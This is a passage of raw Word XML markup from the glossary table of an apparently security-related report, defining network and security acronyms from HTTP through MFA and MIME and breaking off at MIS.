            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D26E11D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hyper Text Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2A3F04C6" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="018D0887" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A8CE522" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hyper Text Transfer Protocol Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2E7B7F7D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4EA6E07B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HUC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72FEA7E2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Honker Union of China</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6518CF8F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52D6B7F3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="125BC171" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Infrastructure-as-a-Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="175A7CA2" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03DF940B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="333F1D79" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Internet Control Message Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1F570D7C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="056C05E2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1C2A56F7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Internet Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="25B5EF55" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="69AD1A06" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="30CC3910" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Inter-Process Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="49583C77" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FAB6585" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D6290C1" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Information System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2BA7BB7B" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="591480EA" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>JDWP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02A26921" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Java Debug Wire Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2A89F7AB" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CD022C5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37D2BC2E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Local Area Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1235A543" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09EF357D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38E3B222" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lightweight Directory Access Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2AB47918" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F11A5D3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LDAPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5313691E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LDAP over SSL or Secure LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="603AEBB8" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68965559" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LLMNR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A552A0C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Link-Local Multicast Name Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1DC75621" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F71D81F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LSASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D7CF4C7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Security Authentication Server </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4D8B6C7D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="033FEFAE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46DAA8D2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="73FC846E" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78CDCCFA" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A3D7D4C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Master Boot Record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="379917CB" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3971562A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C0359CE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Message Digest algorithm number 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1DAEF35B" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07328610" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="384DD9F2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-Factor Authentication </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="53B442FE" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5BBAA6C0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MIME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="229BF289" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Multipurpose Internet Mail Extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7A108E53" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="457AE037" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
